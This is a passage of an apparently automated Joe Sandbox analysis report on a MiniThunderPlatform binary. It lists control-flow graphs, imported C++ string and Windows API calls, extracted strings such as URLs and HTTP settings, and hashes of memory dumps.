                                                                                                                                              control_flow_graph 373 41b760-41b847 call 4185b8 call 417bef * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 418004 call 417bef call 4176cc call 417bef call 41785c 390 41b861-41b8b1 call 4172ad call 41744c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 418004 call 41787f 373->390 391 41b849-41b8e1 call 4172ad ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI@Z call 418004 373->391 411 41c0fd-41c12b call 417726 call 418004 390->411 407 41b8e3-41b90e ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI@Z call 418004 391->407 408 41b927-41b942 391->408 407->408 436 41b910-41b922 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z call 418004 407->436 409 41ba80-41ba87 408->409 410 41b948-41ba14 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 call 4179c4 408->410 413 41baa6-41bb68 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 call 41723f 409->413 414 41ba89-41ba90 409->414 410->409 495 41ba16-41ba62 call 4180bd ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 call 4174c4 410->495 418 41bb72-41bb79 413->418 414->418 419 41ba96-41baa0 414->419 427 41bbb2-41bbb9 418->427 428 41bb7b-41bbad ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 call 418487 418->428 419->413 419->418 434 41bbf8-41bbff 427->434 435 41bbbb-41bbbf 427->435 428->427 438 41bc01-41bc05 434->438 439 41bc24-41bcda ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 418004 ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ call 418004 ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12@XZ call 418004 ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ call 418004 call 4170ff ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z call 418004 434->439 435->434 443 41bbc1-41bbf3 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 call 418450 435->443 436->408 438->439 444 41bc07-41bc1f call 4170be 438->444 492 41bd02-41bd25 call 4170be call 41834c 439->492 493 41bcdc-41bd00 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z call 418004 439->493 443->434 444->439 502 41bd2a-41bd31 492->502 493->492 493->502 534 41ba67-41ba7b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 418004 495->534 505 41bd33-41bd4d ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE_NXZ call 418004 502->505 506 41bd8c-41bd93 502->506 505->506 517 41bd4f-41bd87 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 call 4173cf 505->517 507 41bff1-41bff8 506->507 508 41bd99-41bda0 506->508 511 41c035-41c086 call 417bef * 2 call 417bdb 507->511 512 41bffa-41c030 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 call 417d48 507->512 513 41bda6-41be55 call 417677 * 3 call 417569 call 417703 * 3 508->513 514 41be5a-41be8b ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 508->514 551 41c094-41c0a5 call 4172ad 511->551 552 41c088-41c092 call 4172ad 511->552 512->511 513->507 531 41be9b 514->531 532 41be8d-41be99 514->532 517->506 538 41bea5-41bf0e ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 call 417cf8 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 531->538 532->538 534->409 566 41bf10-41bf1c 538->566 567 41bf1e 538->567 562 41c0aa-41c0f8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 418004 call 41744c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 418004 call 41787f 551->562 552->562 562->411 570 41bf28-41bf85 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 call 417cf8 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ call 418004 566->570 567->570 585 41bf95 570->585 586 41bf87-41bf93 570->586 587 41bf9f-41bfec ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 418004 call 417cf8 call 417703 585->587 586->587 587->507
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000002,00000000,00000005,?), ref: 0041B7E2
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000006,?,00000004,?), ref: 0041B892
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(?,?,00000006,?,00000004,?), ref: 0041B8BB
                                                                                                                                              • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI@Z.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B8CE
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(?,00000006,?,00000004,?), ref: 0041B8E8
                                                                                                                                              • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI@Z.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B8FB
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(004480A8,?,00000006,?,00000004,?), ref: 0041B91A
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B954
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B967
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B97A
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B98D
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(004480A5,00000000,00000000,?,00000006,?,00000004,?), ref: 0041B9AA
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B9C0
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B9D6
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041B9EC
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71 ref: 0041BA39
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000), ref: 0041BA4F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 0041BA73
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BAB2
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BAC5
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BAD8
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BAEB
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(004480A5,00000000,00000000,?,00000006,?,00000004,?), ref: 0041BB08
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BB1E
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BB34
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BB4A
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BB80
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BB93
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BBC6
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000,?,00000006,?,00000004,?), ref: 0041BBD9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,00000006,?,00000004,?), ref: 0041BC33
                                                                                                                                              • ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,7C373C84,?,00000006,?,00000004,?), ref: 0041BC59
                                                                                                                                              • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12@XZ.MSVCP71(?,?,?,00000006,?,00000004,?), ref: 0041BC78
                                                                                                                                              • ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,?,?,?,00000006,?,00000004,?), ref: 0041BC97
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(mail-attachment.googleusercontent.com,00000000,00000004,?), ref: 0041BCC5
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(http://store.paycenter.uc.cn,00000000), ref: 0041BCEB
                                                                                                                                              • ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE_NXZ.MSVCP71(0044FBB0,00000000,00000001,00000001,0044FBB0,00000000,00000001), ref: 0041BD3B
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71 ref: 0041BD57
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000), ref: 0041BD6D
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(0044FBB0,00000000,00000001,00000001,0044FBB0,00000000,00000001), ref: 0041BE6E
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(?), ref: 0041BEC0
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71 ref: 0041BEF1
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(?), ref: 0041BF43
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71 ref: 0041BF68
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(?), ref: 0041BFBA
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71(0044FBB0,00000000,00000001,00000001,0044FBB0,00000000,00000001), ref: 0041C001
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000), ref: 0041C016
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000002,00000000,00000002,00000000,0044FBB0,00000000,00000001,00000001,0044FBB0,00000000,00000001), ref: 0041C0B6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 0041C0DE
                                                                                                                                              Strings
                                                                                                                                              • mail-attachment.googleusercontent.com, xrefs: 0041BCBA
                                                                                                                                              • http://store.paycenter.uc.cn, xrefs: 0041BCE0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$?size@?$basic_string@_$?data@?$basic_string@$??1?$basic_string@$??0?$basic_string@?find@?$basic_string@?rend@?$basic_string@A?$basic_string@D@2@@std@@@2@V?$reverse_iterator@Vconst_iterator@?$basic_string@$?empty@?$basic_string@_?end@?$basic_string@V01@V01@@Vconst_iterator@12@Y?$basic_string@
                                                                                                                                              • String ID: http://store.paycenter.uc.cn$mail-attachment.googleusercontent.com
                                                                                                                                              • API String ID: 2249635939-1724680441
                                                                                                                                              • Opcode ID: 2dd8f6cc9ef5ee57a4b63997e51c1e459b062c25744f9e9819b1fdad838af0dc
                                                                                                                                              • Instruction ID: 066bf038f56cc16361b5249d0fcda2599b46d5e5efeb250fdf9e3778dc7c4e7d
                                                                                                                                              • Opcode Fuzzy Hash: 2dd8f6cc9ef5ee57a4b63997e51c1e459b062c25744f9e9819b1fdad838af0dc
                                                                                                                                              • Instruction Fuzzy Hash: E54251718005289FD760EB55DC96BEDB775EB08308F0541AEE50AA7291CF386EC8CF99
                                                                                                                                              Function 100A6A40 Relevance: 75.7, APIs: 27, Strings: 16, Instructions: 408COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 593 100a6a40-100a6a85 594 100a6a8f 593->594 595 100a6a87-100a6a8d 593->595 596 100a6a91-100a6cc0 call 100c8960 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 100a5820 call 10027770 * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078d00 call 10027700 594->596 595->596 612 100a6cc2-100a6cd4 596->612 613 100a6cd6 596->613 614 100a6cdc-100a6d4c call 1001a56c call 100090b0 call 10027a70 call 10093710 612->614 613->614 624 100a737d-100a741b call 100261b0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 call 100131c0 * 2 614->624 625 100a6d52 614->625 633 100a741d 624->633 634 100a7422-100a74c8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 call 100131c0 * 2 624->634 625->624 633->634 640 100a74ca 634->640 641 100a74cf-100a750e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 LoadLibraryA 634->641 640->641 642 100a7510-100a7522 GetProcAddress 641->642 643 100a7575-100a758b FreeLibrary 641->643 642->643 644 100a7524-100a7549 call 100258d1 GetAcceptLanguagesA 642->644 645 100a75d8-100a75da 643->645 646 100a758d-100a75d6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 call 10073bb5 643->646 658 100a754b-100a7562 ?clear@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z 644->658 659 100a7568-100a7572 ??_V@YAXPAX@Z 644->659 649 100a75dc-100a761c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 call 10073bb5 645->649 650 100a764d-100a7654 645->650 660 100a7624-100a7644 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 646->660 649->660 651 100a765c-100a7664 650->651 652 100a7656 650->652 656 100a766a-100a7676 651->656 657 100a7666-100a7668 651->657 652->651 664 100a7678-100a7680 656->664 665 100a7696-100a769f 656->665 657->656 663 100a76a7-100a76b8 call 10027a70 657->663 658->659 659->643 660->650 662 100a7646 660->662 662->650 672 100a76ba-100a76bc 663->672 673 100a76c3-100a76c9 663->673 664->663 666 100a7682-100a7694 call 10027700 664->666 665->663 667 100a76a1 665->667 666->663 667->663 674 100a76be-100a76c1 672->674 675 100a76cf-100a771e call 10009120 call 10025980 672->675 673->675 674->673 674->675
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(http_data_pipe), ref: 100A6AB0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100A6B4E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100A6B6E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100A6B87
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A6BFB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(zh-CN,zh;q=0.5,en;q=0.5), ref: 100A6C50
                                                                                                                                                • Part of subcall function 10027700: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?,?,?,100291DB,00000000), ref: 1002771C
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027729
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027736
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027743
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027750
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1002775F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@V12@$?assign@?$basic_string@V12@@$?erase@?$basic_string@
                                                                                                                                              • String ID: +$+$,$.\http_data_pipe.cpp$GetAcceptLanguagesA$Shlwapi.dll$dispatch$enable_fetch_cookie$enable_parse_ref$false$http$http_data_pipe$http_min_expected_sum_length$thunder_assert$timeout_sec$zh-CN,zh;q=0.5,en;q=0.5
                                                                                                                                              • API String ID: 1722151385-731933024
                                                                                                                                              • Opcode ID: a92cb598fed6fae54085db965d889546469010decc1a9c083a0ece6064ec918c
                                                                                                                                              • Instruction ID: a4cdda2590aec21dfd800715f4878f85d3250d1437415fac0b404c8fcb9a1c41
                                                                                                                                              • Opcode Fuzzy Hash: a92cb598fed6fae54085db965d889546469010decc1a9c083a0ece6064ec918c
                                                                                                                                              • Instruction Fuzzy Hash: DC125975108781DFD324CF68C888B9BBBE4FFA9304F44895DE5AA47252DB70A548CF62
                                                                                                                                              Function 1001C17D Relevance: 70.3, APIs: 31, Strings: 9, Instructions: 254COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001C182
                                                                                                                                                • Part of subcall function 10019A36: __EH_prolog.LIBCMT ref: 10019A3B
                                                                                                                                                • Part of subcall function 1001A696: __EH_prolog.LIBCMT ref: 1001A69B
                                                                                                                                                • Part of subcall function 1001A696: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,1001C201,00000000,00000000), ref: 1001A6A8
                                                                                                                                                • Part of subcall function 1001A696: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,1001C201,00000000,00000000), ref: 1001A6B6
                                                                                                                                                • Part of subcall function 10016736: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,1001C210,00000000,00000000), ref: 10016739
                                                                                                                                                • Part of subcall function 10001000: RtlInitializeCriticalSection.NTDLL(?), ref: 1000100D
                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 1001C280
                                                                                                                                              • GetTickCount.KERNEL32 ref: 1001C28C
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,7C3F18B8), ref: 1001C2AC
                                                                                                                                                • Part of subcall function 10013610: ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71 ref: 10013678
                                                                                                                                                • Part of subcall function 10013610: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP71(?,00000000,00000001), ref: 10013690
                                                                                                                                                • Part of subcall function 10013610: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,102404D3,000000FF,1001C2E6,?,?,00000000), ref: 100136B1
                                                                                                                                                • Part of subcall function 10001429: __EH_prolog.LIBCMT ref: 1000142E
                                                                                                                                                • Part of subcall function 10001429: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,10277ABC), ref: 10001441
                                                                                                                                                • Part of subcall function 10001429: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10001452
                                                                                                                                                • Part of subcall function 10001429: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1000145C
